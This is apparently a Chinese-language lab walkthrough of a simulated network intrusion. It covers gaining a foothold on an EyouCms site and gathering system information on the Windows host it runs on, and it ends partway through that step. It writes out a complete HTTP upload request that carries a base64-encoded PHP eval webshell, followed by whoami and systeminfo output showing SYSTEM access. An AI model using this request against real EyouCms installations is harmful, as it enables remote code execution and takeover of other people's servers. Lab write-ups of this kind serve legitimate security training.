lab01
信息
场景介绍
本次小李的任务是攻克 192.168.10.0/24 网段的所有主机,刚开始挺顺利,但深入后发现里面的情况远比想象的复杂。
- 多层代理
- 域渗透
- 仿真实战
- 信息收集
入口点
http://192.168.10.10/
EyouCms RCE
根据页脚信息,可以确定为 EyouCms 框架
根据漏洞信息,可以检索到 eyoucms 前台 getshell 复现・Hu3sky's blog
根据复现文章,构建文件上传请求

POST /index.php/api/Uploadify/preview HTTP/1.1
Host: 192.168.10.10
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=
即可成功上传 webshell

flag - 1
在 C 盘根目录即可发现 flag.txt 文件

入口机 - WIN-KOHRC1DGOL9 - 信息收集
获取基础信息
C:\phpstudy_pro\WWW\eyoucms1.0\preview> whoami
nt authority\system
C:\phpstudy_pro\WWW\eyoucms1.0\preview> systeminfo
主机名: WIN-KOHRC1DGOL9
OS 名称: Microsoft Windows Server 2012 R2 Standard
OS 版本: 6.3.9600 暂缺 Build 9600
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00252-60020-02714-AA020
初始安装日期: 2025/1/6, 11:21:56
系统启动时间: 2025/10/25, 10:32:01
系统制造商: Red Hat
系统型号: KVM
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~2000 Mhz
BIOS 版本: SeaBIOS 1.16.3-2.el9, 2014/4/1
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 1,023 MB
可用的物理内存: 448 MB